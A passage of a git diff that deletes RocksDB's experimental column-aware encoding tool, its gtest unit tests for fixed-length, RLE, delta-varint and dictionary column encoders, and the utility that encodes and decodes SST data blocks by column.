-      std::vector<KVPairBlock> kv_pair_blocks;
-      reader.GetKVPairsFromDataBlocks(&kv_pair_blocks);
-      reader.DumpDataColumns(FLAGS_dump_file, kvp_cd, kv_pair_blocks);
-      return;
-    }
-    std::unordered_map<std::string, CompressionType> compressions = {
-        {"kNoCompression", CompressionType::kNoCompression},
-        {"kZlibCompression", CompressionType::kZlibCompression},
-        {"kZSTD", CompressionType::kZSTD}};
-
-    // Find Compression
-    CompressionType compression_type = compressions[FLAGS_compression_type];
-    EnvOptions env_options;
-    if (CompressionTypeSupported(compression_type)) {
-      fprintf(stdout, "[%s]\n", FLAGS_compression_type.c_str());
-      unique_ptr<WritableFile> encoded_out_file;
-
-      std::unique_ptr<Env> env(NewMemEnv(Env::Default()));
-      if (!FLAGS_encoded_file.empty()) {
-        env->NewWritableFile(FLAGS_encoded_file, &encoded_out_file,
-                             env_options);
-      }
-
-      std::vector<KVPairBlock> kv_pair_blocks;
-      reader.GetKVPairsFromDataBlocks(&kv_pair_blocks);
-
-      std::vector<std::string> encoded_blocks;
-      StopWatchNano sw(env.get(), true);
-      if (FLAGS_format == "col") {
-        reader.EncodeBlocks(kvp_cd, encoded_out_file.get(), compression_type,
-                            kv_pair_blocks, &encoded_blocks, FLAGS_stat);
-      } else {  // row format
-        reader.EncodeBlocksToRowFormat(encoded_out_file.get(), compression_type,
-                                       kv_pair_blocks, &encoded_blocks);
-      }
-      if (encoded_out_file != nullptr) {
-        uint64_t size = 0;
-        env->GetFileSize(FLAGS_encoded_file, &size);
-        fprintf(stdout, "File size: %" PRIu64 "\n", size);
-      }
-      uint64_t encode_time = sw.ElapsedNanosSafe(false /* reset */);
-      fprintf(stdout, "Encode time: %" PRIu64 "\n", encode_time);
-      if (decode) {
-        unique_ptr<WritableFile> decoded_out_file;
-        if (!FLAGS_decoded_file.empty()) {
-          env->NewWritableFile(FLAGS_decoded_file, &decoded_out_file,
-                               env_options);
-        }
-        sw.Start();
-        if (FLAGS_format == "col") {
-          reader.DecodeBlocks(kvp_cd, decoded_out_file.get(), &encoded_blocks);
-        } else {
-          reader.DecodeBlocksFromRowFormat(decoded_out_file.get(),
-                                           &encoded_blocks);
-        }
-        uint64_t decode_time = sw.ElapsedNanosSafe(true /* reset */);
-        fprintf(stdout, "Decode time: %" PRIu64 "\n", decode_time);
-      }
-    } else {
-      fprintf(stdout, "Unsupported compression type: %s.\n",
-              FLAGS_compression_type.c_str());
-    }
-    delete key_col_declarations;
-    delete value_col_declarations;
-    delete value_checksum_declaration;
-  }
-};
-
-}  // namespace rocksdb
-
-int main(int argc, char** argv) {
-  int arg_idx = ParseCommandLineFlags(&argc, &argv, true);
-  if (arg_idx >= argc) {
-    fprintf(stdout, "SST filename required.\n");
-    exit(1);
-  }
-  std::string sst_file(argv[arg_idx]);
-  if (FLAGS_format != "row" && FLAGS_format != "col") {
-    fprintf(stderr, "Format must be 'row' or 'col'\n");
-    exit(1);
-  }
-  if (FLAGS_index_type != "primary" && FLAGS_index_type != "secondary") {
-    fprintf(stderr, "Format must be 'primary' or 'secondary'\n");
-    exit(1);
-  }
-  rocksdb::ColumnAwareEncodingExp::Run(sst_file);
-  return 0;
-}
-
-#else
-int main() {
-  fprintf(stderr, "Please install gflags to run rocksdb tools\n");
-  return 1;
-}
-#endif  // GFLAGS
-#else
-int main(int argc, char** argv) {
-  fprintf(stderr, "Not supported in lite mode.\n");
-  return 1;
-}
-#endif  // ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/utilities/column_aware_encoding_test.cc b/thirdparty/rocksdb/utilities/column_aware_encoding_test.cc
deleted file mode 100644
index b99ff56..0000000
--- a/thirdparty/rocksdb/utilities/column_aware_encoding_test.cc
+++ /dev/null
@@ -1,254 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-#ifndef ROCKSDB_LITE
-
-#include <vector>
-#include "util/testharness.h"
-#include "util/testutil.h"
-#include "utilities/col_buf_decoder.h"
-#include "utilities/col_buf_encoder.h"
-
-namespace rocksdb {
-
-class ColumnAwareEncodingTest : public testing::Test {
- public:
-  ColumnAwareEncodingTest() {}
-
-  ~ColumnAwareEncodingTest() {}
-};
-
-class ColumnAwareEncodingTestWithSize
-    : public ColumnAwareEncodingTest,
-      public testing::WithParamInterface<size_t> {
- public:
-  ColumnAwareEncodingTestWithSize() {}
-
-  ~ColumnAwareEncodingTestWithSize() {}
-
-  static std::vector<size_t> GetValues() { return {4, 8}; }
-};
-
-INSTANTIATE_TEST_CASE_P(
-    ColumnAwareEncodingTestWithSize, ColumnAwareEncodingTestWithSize,
-    ::testing::ValuesIn(ColumnAwareEncodingTestWithSize::GetValues()));
-
-TEST_P(ColumnAwareEncodingTestWithSize, NoCompressionEncodeDecode) {
-  size_t col_size = GetParam();
-  std::unique_ptr<ColBufEncoder> col_buf_encoder(
-      new FixedLengthColBufEncoder(col_size, kColNoCompression, false, true));
-  std::string str_buf;
-  uint64_t base_val = 0x0102030405060708;
-  uint64_t val = 0;
-  memcpy(&val, &base_val, col_size);
-  const int row_count = 4;
-  for (int i = 0; i < row_count; ++i) {
-    str_buf.append(reinterpret_cast<char*>(&val), col_size);
-  }
-  const char* str_buf_ptr = str_buf.c_str();
-  for (int i = 0; i < row_count; ++i) {
-    col_buf_encoder->Append(str_buf_ptr);
-  }
-  col_buf_encoder->Finish();
-  const std::string& encoded_data = col_buf_encoder->GetData();
-  // Check correctness of encoded string length
-  ASSERT_EQ(row_count * col_size, encoded_data.size());
-
-  const char* encoded_data_ptr = encoded_data.c_str();
-  uint64_t expected_encoded_val;
-  if (col_size == 8) {
-    expected_encoded_val = port::kLittleEndian ? 0x0807060504030201 : 0x0102030405060708;
-  } else if (col_size == 4) {
-    expected_encoded_val = port::kLittleEndian ? 0x08070605 : 0x0102030400000000;
-  }
-  uint64_t encoded_val = 0;
-  for (int i = 0; i < row_count; ++i) {
-    memcpy(&encoded_val, encoded_data_ptr, col_size);
-    // Check correctness of encoded value
-    ASSERT_EQ(expected_encoded_val, encoded_val);
-    encoded_data_ptr += col_size;
-  }
-
-  std::unique_ptr<ColBufDecoder> col_buf_decoder(
-      new FixedLengthColBufDecoder(col_size, kColNoCompression, false, true));
-  encoded_data_ptr = encoded_data.c_str();
-  encoded_data_ptr += col_buf_decoder->Init(encoded_data_ptr);
-  char* decoded_data = new char[100];
-  char* decoded_data_base = decoded_data;
-  for (int i = 0; i < row_count; ++i) {
-    encoded_data_ptr +=
-        col_buf_decoder->Decode(encoded_data_ptr, &decoded_data);
-  }
-
-  // Check correctness of decoded string length
-  ASSERT_EQ(row_count * col_size, decoded_data - decoded_data_base);
-  decoded_data = decoded_data_base;
-  for (int i = 0; i < row_count; ++i) {
-    uint64_t decoded_val;
-    decoded_val = 0;
-    memcpy(&decoded_val, decoded_data, col_size);
-    // Check correctness of decoded value
-    ASSERT_EQ(val, decoded_val);
-    decoded_data += col_size;
-  }
-  delete[] decoded_data_base;
-}
-
-TEST_P(ColumnAwareEncodingTestWithSize, RleEncodeDecode) {
-  size_t col_size = GetParam();
-  std::unique_ptr<ColBufEncoder> col_buf_encoder(
-      new FixedLengthColBufEncoder(col_size, kColRle, false, true));
-  std::string str_buf;
-  uint64_t base_val = 0x0102030405060708;
-  uint64_t val = 0;
-  memcpy(&val, &base_val, col_size);
-  const int row_count = 4;
-  for (int i = 0; i < row_count; ++i) {
-    str_buf.append(reinterpret_cast<char*>(&val), col_size);
-  }
-  const char* str_buf_ptr = str_buf.c_str();
-  for (int i = 0; i < row_count; ++i) {
-    str_buf_ptr += col_buf_encoder->Append(str_buf_ptr);
-  }
-  col_buf_encoder->Finish();
-  const std::string& encoded_data = col_buf_encoder->GetData();
-  // Check correctness of encoded string length
-  ASSERT_EQ(col_size + 1, encoded_data.size());
-
-  const char* encoded_data_ptr = encoded_data.c_str();
-  uint64_t encoded_val = 0;
-  memcpy(&encoded_val, encoded_data_ptr, col_size);
-  uint64_t expected_encoded_val;
-  if (col_size == 8) {
-    expected_encoded_val = port::kLittleEndian ? 0x0807060504030201 : 0x0102030405060708;
-  } else if (col_size == 4) {
-    expected_encoded_val = port::kLittleEndian ? 0x08070605 : 0x0102030400000000;
-  }
-  // Check correctness of encoded value
-  ASSERT_EQ(expected_encoded_val, encoded_val);
-
-  std::unique_ptr<ColBufDecoder> col_buf_decoder(
-      new FixedLengthColBufDecoder(col_size, kColRle, false, true));
-  char* decoded_data = new char[100];
-  char* decoded_data_base = decoded_data;
-  encoded_data_ptr += col_buf_decoder->Init(encoded_data_ptr);
-  for (int i = 0; i < row_count; ++i) {
-    encoded_data_ptr +=
-        col_buf_decoder->Decode(encoded_data_ptr, &decoded_data);
-  }
-  // Check correctness of decoded string length
-  ASSERT_EQ(decoded_data - decoded_data_base, row_count * col_size);
-  decoded_data = decoded_data_base;
-  for (int i = 0; i < row_count; ++i) {
-    uint64_t decoded_val;
-    decoded_val = 0;
-    memcpy(&decoded_val, decoded_data, col_size);
-    // Check correctness of decoded value
-    ASSERT_EQ(val, decoded_val);
-    decoded_data += col_size;
-  }
-  delete[] decoded_data_base;
-}
-
-TEST_P(ColumnAwareEncodingTestWithSize, DeltaEncodeDecode) {
-  size_t col_size = GetParam();
-  int row_count = 4;
-  std::unique_ptr<ColBufEncoder> col_buf_encoder(
-      new FixedLengthColBufEncoder(col_size, kColDeltaVarint, false, true));
-  std::string str_buf;
-  uint64_t base_val1 = port::kLittleEndian ? 0x0102030405060708 : 0x0807060504030201;
-  uint64_t base_val2 = port::kLittleEndian ? 0x0202030405060708 : 0x0807060504030202;
-  uint64_t val1 = 0, val2 = 0;
-  memcpy(&val1, &base_val1, col_size);
-  memcpy(&val2, &base_val2, col_size);
-  const char* str_buf_ptr;
-  for (int i = 0; i < row_count / 2; ++i) {
-    str_buf = std::string(reinterpret_cast<char*>(&val1), col_size);
-    str_buf_ptr = str_buf.c_str();
-    col_buf_encoder->Append(str_buf_ptr);
-
-    str_buf = std::string(reinterpret_cast<char*>(&val2), col_size);
-    str_buf_ptr = str_buf.c_str();
-    col_buf_encoder->Append(str_buf_ptr);
-  }
-  col_buf_encoder->Finish();
-  const std::string& encoded_data = col_buf_encoder->GetData();
-  // Check encoded string length
-  int varint_len = 0;
-  if (col_size == 8) {
-    varint_len = 9;
-  } else if (col_size == 4) {
-    varint_len = port::kLittleEndian ? 5 : 9;
-  }
-  // Check encoded string length: first value is original one (val - 0), the
-  // coming three are encoded as 1, -1, 1, so they should take 1 byte in varint.
-  ASSERT_EQ(varint_len + 3 * 1, encoded_data.size());
-
-  std::unique_ptr<ColBufDecoder> col_buf_decoder(
-      new FixedLengthColBufDecoder(col_size, kColDeltaVarint, false, true));
-  char* decoded_data = new char[100];
-  char* decoded_data_base = decoded_data;
-  const char* encoded_data_ptr = encoded_data.c_str();
-  encoded_data_ptr += col_buf_decoder->Init(encoded_data_ptr);
-  for (int i = 0; i < row_count; ++i) {
-    encoded_data_ptr +=
-        col_buf_decoder->Decode(encoded_data_ptr, &decoded_data);
-  }
-
-  // Check correctness of decoded string length
-  ASSERT_EQ(row_count * col_size, decoded_data - decoded_data_base);
-  decoded_data = decoded_data_base;
-
-  // Check correctness of decoded data
-  for (int i = 0; i < row_count / 2; ++i) {
-    uint64_t decoded_val = 0;
-    memcpy(&decoded_val, decoded_data, col_size);
-    ASSERT_EQ(val1, decoded_val);
-    decoded_data += col_size;
-    memcpy(&decoded_val, decoded_data, col_size);
-    ASSERT_EQ(val2, decoded_val);
-    decoded_data += col_size;
-  }
-  delete[] decoded_data_base;
-}
-
-TEST_F(ColumnAwareEncodingTest, ChunkBufEncodeDecode) {
-  std::unique_ptr<ColBufEncoder> col_buf_encoder(
-      new VariableChunkColBufEncoder(kColDict));
-  std::string buf("12345678\377\1\0\0\0\0\0\0\0\376", 18);
-  col_buf_encoder->Append(buf.c_str());
-  col_buf_encoder->Finish();
-  const std::string& encoded_data = col_buf_encoder->GetData();
-  const char* str_ptr = encoded_data.c_str();
-
-  std::unique_ptr<ColBufDecoder> col_buf_decoder(
-      new VariableChunkColBufDecoder(kColDict));
-  str_ptr += col_buf_decoder->Init(str_ptr);
-  char* decoded_data = new char[100];
-  char* decoded_data_base = decoded_data;
-  col_buf_decoder->Decode(str_ptr, &decoded_data);
-  for (size_t i = 0; i < buf.size(); ++i) {
-    ASSERT_EQ(buf[i], decoded_data_base[i]);
-  }
-  delete[] decoded_data_base;
-}
-
-}  // namespace rocksdb
-
-int main(int argc, char** argv) {
-  ::testing::InitGoogleTest(&argc, argv);
-  return RUN_ALL_TESTS();
-}
-
-#else
-
-#include <cstdio>
-
-int main() {
-  fprintf(stderr,
-          "SKIPPED as column aware encoding experiment is not enabled in "
-          "ROCKSDB_LITE\n");
-}
-#endif  // ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/utilities/column_aware_encoding_util.cc b/thirdparty/rocksdb/utilities/column_aware_encoding_util.cc
deleted file mode 100644
index c36e422..0000000
--- a/thirdparty/rocksdb/utilities/column_aware_encoding_util.cc
+++ /dev/null
@@ -1,490 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-#ifndef ROCKSDB_LITE
-
-#include "utilities/column_aware_encoding_util.h"
-
-#ifndef __STDC_FORMAT_MACROS
-#define __STDC_FORMAT_MACROS
-#endif
-
-#include <stddef.h>
-#include <stdint.h>
-#include <stdio.h>
-#include <algorithm>
-#include <utility>
-#include <vector>
-#include "include/rocksdb/comparator.h"
-#include "include/rocksdb/slice.h"
-#include "rocksdb/env.h"
-#include "rocksdb/status.h"
-#include "table/block_based_table_builder.h"
-#include "table/block_based_table_factory.h"
-#include "table/format.h"
-#include "table/table_reader.h"
-#include "util/coding.h"
-#include "utilities/col_buf_decoder.h"
-#include "utilities/col_buf_encoder.h"
-
-#include "port/port.h"
-
-namespace rocksdb {
-
-ColumnAwareEncodingReader::ColumnAwareEncodingReader(
-    const std::string& file_path)
-    : file_name_(file_path),
-      ioptions_(options_),
-      internal_comparator_(BytewiseComparator()) {
-  InitTableReader(file_name_);
-}
-
-void ColumnAwareEncodingReader::InitTableReader(const std::string& file_path) {
-  std::unique_ptr<RandomAccessFile> file;
-  uint64_t file_size;
-  options_.env->NewRandomAccessFile(file_path, &file, soptions_);
-  options_.env->GetFileSize(file_path, &file_size);
-
-  file_.reset(new RandomAccessFileReader(std::move(file), file_path));
-
-  options_.comparator = &internal_comparator_;
-  options_.table_factory = std::make_shared<BlockBasedTableFactory>();
-
-  std::unique_ptr<TableReader> table_reader;
-  options_.table_factory->NewTableReader(
-      TableReaderOptions(ioptions_, soptions_, internal_comparator_,
-                         /*skip_filters=*/false),
-      std::move(file_), file_size, &table_reader, /*enable_prefetch=*/false);
-
-  table_reader_.reset(dynamic_cast<BlockBasedTable*>(table_reader.release()));
-}
-
-void ColumnAwareEncodingReader::GetKVPairsFromDataBlocks(
-    std::vector<KVPairBlock>* kv_pair_blocks) {
-  table_reader_->GetKVPairsFromDataBlocks(kv_pair_blocks);
-}
-
-void ColumnAwareEncodingReader::DecodeBlocks(
-    const KVPairColDeclarations& kvp_col_declarations, WritableFile* out_file,
-    const std::vector<std::string>* blocks) {
-  char* decoded_content_base = new char[16384];
-  Options options;
-  ImmutableCFOptions ioptions(options);
-  for (auto& block : *blocks) {
-    KVPairColBufDecoders kvp_col_bufs(kvp_col_declarations);
-    auto& key_col_bufs = kvp_col_bufs.key_col_bufs;
-    auto& value_col_bufs = kvp_col_bufs.value_col_bufs;
-    auto& value_checksum_buf = kvp_col_bufs.value_checksum_buf;
-
-    auto& slice_final_with_bit = block;
-    uint32_t format_version = 2;
-    Slice compression_dict;
-    BlockContents contents;
-    const char* content_ptr;
-
-    CompressionType type =
-        (CompressionType)slice_final_with_bit[slice_final_with_bit.size() - 1];
-    if (type != kNoCompression) {
-      UncompressBlockContents(slice_final_with_bit.c_str(),
-                              slice_final_with_bit.size() - 1, &contents,
-                              format_version, compression_dict, ioptions);
-      content_ptr = contents.data.data();
-    } else {
-      content_ptr = slice_final_with_bit.data();
-    }
-
-    size_t num_kv_pairs;
-    const char* header_content_ptr = content_ptr;
-    num_kv_pairs = DecodeFixed64(header_content_ptr);
-
-    header_content_ptr += sizeof(size_t);
-    size_t num_key_columns = key_col_bufs.size();
-    size_t num_value_columns = value_col_bufs.size();
-    std::vector<const char*> key_content_ptr(num_key_columns);
-    std::vector<const char*> value_content_ptr(num_value_columns);
-    const char* checksum_content_ptr;
-
-    size_t num_columns = num_key_columns + num_value_columns;
-    const char* col_content_ptr =
-        header_content_ptr + sizeof(size_t) * num_columns;
-
-    // Read headers
-    for (size_t i = 0; i < num_key_columns; ++i) {
-      key_content_ptr[i] = col_content_ptr;
-      key_content_ptr[i] += key_col_bufs[i]->Init(key_content_ptr[i]);
-      size_t offset;
-      offset = DecodeFixed64(header_content_ptr);
-      header_content_ptr += sizeof(size_t);
-      col_content_ptr += offset;
-    }
-    for (size_t i = 0; i < num_value_columns; ++i) {
-      value_content_ptr[i] = col_content_ptr;
-      value_content_ptr[i] += value_col_bufs[i]->Init(value_content_ptr[i]);
-      size_t offset;
-      offset = DecodeFixed64(header_content_ptr);
-      header_content_ptr += sizeof(size_t);
-      col_content_ptr += offset;
-    }
-    checksum_content_ptr = col_content_ptr;
-    checksum_content_ptr += value_checksum_buf->Init(checksum_content_ptr);
-
-    // Decode block
-    char* decoded_content = decoded_content_base;
-    for (size_t j = 0; j < num_kv_pairs; ++j) {
-      for (size_t i = 0; i < num_key_columns; ++i) {
-        key_content_ptr[i] +=
-            key_col_bufs[i]->Decode(key_content_ptr[i], &decoded_content);
-      }
-      for (size_t i = 0; i < num_value_columns; ++i) {
-        value_content_ptr[i] +=
-            value_col_bufs[i]->Decode(value_content_ptr[i], &decoded_content);
-      }
-      checksum_content_ptr +=
-          value_checksum_buf->Decode(checksum_content_ptr, &decoded_content);
-    }
-
-    size_t offset = decoded_content - decoded_content_base;
-    Slice output_content(decoded_content, offset);
-
-    if (out_file != nullptr) {
-      out_file->Append(output_content);
-    }
-  }
-  delete[] decoded_content_base;
-}
-
-void ColumnAwareEncodingReader::DecodeBlocksFromRowFormat(
-    WritableFile* out_file, const std::vector<std::string>* blocks) {
-  Options options;
-  ImmutableCFOptions ioptions(options);
-  for (auto& block : *blocks) {
-    auto& slice_final_with_bit = block;
-    uint32_t format_version = 2;
-    Slice compression_dict;
-    BlockContents contents;
-    std::string decoded_content;
-
-    CompressionType type =
-        (CompressionType)slice_final_with_bit[slice_final_with_bit.size() - 1];
-    if (type != kNoCompression) {
-      UncompressBlockContents(slice_final_with_bit.c_str(),
-                              slice_final_with_bit.size() - 1, &contents,
-                              format_version, compression_dict, ioptions);
-      decoded_content = std::string(contents.data.data(), contents.data.size());
-    } else {
-      decoded_content = std::move(slice_final_with_bit);
-    }
-
-    if (out_file != nullptr) {
-      out_file->Append(decoded_content);
-    }
-  }
-}
-
-void ColumnAwareEncodingReader::DumpDataColumns(
-    const std::string& filename,
-    const KVPairColDeclarations& kvp_col_declarations,
-    const std::vector<KVPairBlock>& kv_pair_blocks) {
-  KVPairColBufEncoders kvp_col_bufs(kvp_col_declarations);
-  auto& key_col_bufs = kvp_col_bufs.key_col_bufs;
-  auto& value_col_bufs = kvp_col_bufs.value_col_bufs;
-  auto& value_checksum_buf = kvp_col_bufs.value_checksum_buf;
-
-  FILE* fp = fopen(filename.c_str(), "w");
-  size_t block_id = 1;
-  for (auto& kv_pairs : kv_pair_blocks) {
-    fprintf(fp, "---------------- Block: %-4" ROCKSDB_PRIszt " ----------------\n", block_id);
-    for (auto& kv_pair : kv_pairs) {
-      const auto& key = kv_pair.first;
-      const auto& value = kv_pair.second;
-      size_t value_offset = 0;
-
-      const char* key_ptr = key.data();
-      for (auto& buf : key_col_bufs) {
-        size_t col_size = buf->Append(key_ptr);
-        std::string tmp_buf(key_ptr, col_size);
-        Slice col(tmp_buf);
-        fprintf(fp, "%s ", col.ToString(true).c_str());
-        key_ptr += col_size;
-      }
-      fprintf(fp, "|");
-
-      const char* value_ptr = value.data();
-      for (auto& buf : value_col_bufs) {
-        size_t col_size = buf->Append(value_ptr);
-        std::string tmp_buf(value_ptr, col_size);
-        Slice col(tmp_buf);
-        fprintf(fp, " %s", col.ToString(true).c_str());
-        value_ptr += col_size;
-        value_offset += col_size;
-      }
-
-      if (value_offset < value.size()) {
-        size_t col_size = value_checksum_buf->Append(value_ptr);
-        std::string tmp_buf(value_ptr, col_size);
-        Slice col(tmp_buf);
-        fprintf(fp, "|%s", col.ToString(true).c_str());
-      } else {
-        value_checksum_buf->Append(nullptr);
-      }
-      fprintf(fp, "\n");
-    }
-    block_id++;
-  }
-  fclose(fp);
-}
-
-namespace {
-
-void CompressDataBlock(const std::string& output_content, Slice* slice_final,
-                       CompressionType* type, std::string* compressed_output) {
-  CompressionOptions compression_opts;
-  uint32_t format_version = 2;  // hard-coded version
-  Slice compression_dict;
-  *slice_final =
-      CompressBlock(output_content, compression_opts, type, format_version,
-                    compression_dict, compressed_output);
-}
-
-}  // namespace
-
-void ColumnAwareEncodingReader::EncodeBlocksToRowFormat(
-    WritableFile* out_file, CompressionType compression_type,
-    const std::vector<KVPairBlock>& kv_pair_blocks,
-    std::vector<std::string>* blocks) {
-  std::string output_content;
-  for (auto& kv_pairs : kv_pair_blocks) {
-    output_content.clear();
-    std::string last_key;
-    size_t counter = 0;
-    const size_t block_restart_interval = 16;
-    for (auto& kv_pair : kv_pairs) {
-      const auto& key = kv_pair.first;
-      const auto& value = kv_pair.second;
-
-      Slice last_key_piece(last_key);
-      size_t shared = 0;
-      if (counter >= block_restart_interval) {
-        counter = 0;
-      } else {
-        const size_t min_length = std::min(last_key_piece.size(), key.size());
-        while ((shared < min_length) && last_key_piece[shared] == key[shared]) {
-          shared++;
-        }
-      }
-      const size_t non_shared = key.size() - shared;
-      output_content.append(key.c_str() + shared, non_shared);
-      output_content.append(value);
-
-      last_key.resize(shared);
-      last_key.append(key.data() + shared, non_shared);
-      counter++;
-    }
-    Slice slice_final;
-    auto type = compression_type;
-    std::string compressed_output;
-    CompressDataBlock(output_content, &slice_final, &type, &compressed_output);
-
-    if (out_file != nullptr) {
-      out_file->Append(slice_final);
-    }
-
-    // Add a bit in the end for decoding
-    std::string slice_final_with_bit(slice_final.data(), slice_final.size());
-    slice_final_with_bit.append(reinterpret_cast<char*>(&type), 1);
-    blocks->push_back(
-        std::string(slice_final_with_bit.data(), slice_final_with_bit.size()));
-  }
-}
-
-Status ColumnAwareEncodingReader::EncodeBlocks(
-    const KVPairColDeclarations& kvp_col_declarations, WritableFile* out_file,
-    CompressionType compression_type,
-    const std::vector<KVPairBlock>& kv_pair_blocks,
-    std::vector<std::string>* blocks, bool print_column_stat) {
-  std::vector<size_t> key_col_sizes(
-      kvp_col_declarations.key_col_declarations->size(), 0);
-  std::vector<size_t> value_col_sizes(
-      kvp_col_declarations.value_col_declarations->size(), 0);
-  size_t value_checksum_size = 0;
-
-  for (auto& kv_pairs : kv_pair_blocks) {
-    KVPairColBufEncoders kvp_col_bufs(kvp_col_declarations);
-    auto& key_col_bufs = kvp_col_bufs.key_col_bufs;
-    auto& value_col_bufs = kvp_col_bufs.value_col_bufs;
-    auto& value_checksum_buf = kvp_col_bufs.value_checksum_buf;
-
-    size_t num_kv_pairs = 0;
-    for (auto& kv_pair : kv_pairs) {
-      const auto& key = kv_pair.first;
-      const auto& value = kv_pair.second;
-      size_t value_offset = 0;
-      num_kv_pairs++;
-
-      const char* key_ptr = key.data();
-      for (auto& buf : key_col_bufs) {
-        size_t col_size = buf->Append(key_ptr);
-        key_ptr += col_size;
-      }
-
-      const char* value_ptr = value.data();
-      for (auto& buf : value_col_bufs) {
-        size_t col_size = buf->Append(value_ptr);
-        value_ptr += col_size;
-        value_offset += col_size;
-      }
-
-      if (value_offset < value.size()) {
-        value_checksum_buf->Append(value_ptr);
-      } else {
-        value_checksum_buf->Append(nullptr);
-      }
-    }
-
-    kvp_col_bufs.Finish();
-    // Get stats
-    // Compress and write a block
-    if (print_column_stat) {
-      for (size_t i = 0; i < key_col_bufs.size(); ++i) {
-        Slice slice_final;
-        auto type = compression_type;
-        std::string compressed_output;
-        CompressDataBlock(key_col_bufs[i]->GetData(), &slice_final, &type,
-                          &compressed_output);
-        out_file->Append(slice_final);
-        key_col_sizes[i] += slice_final.size();
-      }
-      for (size_t i = 0; i < value_col_bufs.size(); ++i) {
-        Slice slice_final;
-        auto type = compression_type;
-        std::string compressed_output;
-        CompressDataBlock(value_col_bufs[i]->GetData(), &slice_final, &type,
-                          &compressed_output);
-        out_file->Append(slice_final);
-        value_col_sizes[i] += slice_final.size();
-      }
-      Slice slice_final;
-      auto type = compression_type;
-      std::string compressed_output;
-      CompressDataBlock(value_checksum_buf->GetData(), &slice_final, &type,
-                        &compressed_output);
-      out_file->Append(slice_final);
-      value_checksum_size += slice_final.size();
-    } else {
-      std::string output_content;
-      // Write column sizes
-      PutFixed64(&output_content, num_kv_pairs);
-      for (auto& buf : key_col_bufs) {
-        size_t size = buf->GetData().size();
-        PutFixed64(&output_content, size);
-      }
-      for (auto& buf : value_col_bufs) {
-        size_t size = buf->GetData().size();
-        PutFixed64(&output_content, size);
-      }
-      // Write data
-      for (auto& buf : key_col_bufs) {
-        output_content.append(buf->GetData());
-      }
-      for (auto& buf : value_col_bufs) {
-        output_content.append(buf->GetData());
-      }
-      output_content.append(value_checksum_buf->GetData());
-
-      Slice slice_final;
-      auto type = compression_type;
-      std::string compressed_output;
-      CompressDataBlock(output_content, &slice_final, &type,
-                        &compressed_output);
-
-      if (out_file != nullptr) {
-        out_file->Append(slice_final);
-      }
-
-      // Add a bit in the end for decoding
-      std::string slice_final_with_bit(slice_final.data(),
-                                       slice_final.size() + 1);
-      slice_final_with_bit[slice_final.size()] = static_cast<char>(type);
-      blocks->push_back(std::string(slice_final_with_bit.data(),
-                                    slice_final_with_bit.size()));
-    }
-  }
-
-  if (print_column_stat) {
-    size_t total_size = 0;
-    for (size_t i = 0; i < key_col_sizes.size(); ++i)
-      total_size += key_col_sizes[i];
-    for (size_t i = 0; i < value_col_sizes.size(); ++i)
-      total_size += value_col_sizes[i];
-    total_size += value_checksum_size;
-
-    for (size_t i = 0; i < key_col_sizes.size(); ++i)
-      printf("Key col %" ROCKSDB_PRIszt " size: %" ROCKSDB_PRIszt " percentage %lf%%\n", i, key_col_sizes[i],
-             100.0 * key_col_sizes[i] / total_size);
-    for (size_t i = 0; i < value_col_sizes.size(); ++i)
-      printf("Value col %" ROCKSDB_PRIszt " size: %" ROCKSDB_PRIszt " percentage %lf%%\n", i,
-             value_col_sizes[i], 100.0 * value_col_sizes[i] / total_size);
-    printf("Value checksum size: %" ROCKSDB_PRIszt " percentage %lf%%\n", value_checksum_size,
-           100.0 * value_checksum_size / total_size);
-  }
-  return Status::OK();
-}
-
-void ColumnAwareEncodingReader::GetColDeclarationsPrimary(
-    std::vector<ColDeclaration>** key_col_declarations,
-    std::vector<ColDeclaration>** value_col_declarations,
-    ColDeclaration** value_checksum_declaration) {
-  *key_col_declarations = new std::vector<ColDeclaration>{
-      ColDeclaration("FixedLength", ColCompressionType::kColRleVarint, 4, false,
-                     true),
-      ColDeclaration("FixedLength", ColCompressionType::kColRleDeltaVarint, 8,
-                     false, true),
-      ColDeclaration("FixedLength", ColCompressionType::kColDeltaVarint, 8,
-                     false, true),
-      ColDeclaration("FixedLength", ColCompressionType::kColDeltaVarint, 8,
-                     false, true),
-      ColDeclaration("FixedLength", ColCompressionType::kColRleVarint, 8)};
-
-  *value_col_declarations = new std::vector<ColDeclaration>{
-      ColDeclaration("FixedLength", ColCompressionType::kColRleVarint, 4),
-      ColDeclaration("FixedLength", ColCompressionType::kColRleVarint, 4),
-      ColDeclaration("FixedLength", ColCompressionType::kColRle, 1),
-      ColDeclaration("VariableLength"),
-      ColDeclaration("FixedLength", ColCompressionType::kColDeltaVarint, 4),
-      ColDeclaration("FixedLength", ColCompressionType::kColRleVarint, 8)};
-  *value_checksum_declaration = new ColDeclaration(
-      "LongFixedLength", ColCompressionType::kColNoCompression, 9,
-      true /* nullable */);
-}
-
-void ColumnAwareEncodingReader::GetColDeclarationsSecondary(
-    std::vector<ColDeclaration>** key_col_declarations,
-    std::vector<ColDeclaration>** value_col_declarations,
-    ColDeclaration** value_checksum_declaration) {
-  *key_col_declarations = new std::vector<ColDeclaration>{
-      ColDeclaration("FixedLength", ColCompressionType::kColRleVarint, 4, false,
-                     true),
-      ColDeclaration("FixedLength", ColCompressionType::kColDeltaVarint, 8,
-                     false, true),
-      ColDeclaration("FixedLength", ColCompressionType::kColRleDeltaVarint, 8,
-                     false, true),
-      ColDeclaration("FixedLength", ColCompressionType::kColRle, 1),
-      ColDeclaration("FixedLength", ColCompressionType::kColDeltaVarint, 4,
-                     false, true),
-      ColDeclaration("FixedLength", ColCompressionType::kColDeltaVarint, 8,
-                     false, true),
-      ColDeclaration("FixedLength", ColCompressionType::kColRleVarint, 8, false,
-                     true),
-      ColDeclaration("VariableChunk", ColCompressionType::kColNoCompression),
-      ColDeclaration("FixedLength", ColCompressionType::kColRleVarint, 8)};
-  *value_col_declarations = new std::vector<ColDeclaration>();
-  *value_checksum_declaration = new ColDeclaration(
-      "LongFixedLength", ColCompressionType::kColNoCompression, 9,
-      true /* nullable */);
-}
-
-}  // namespace rocksdb
-
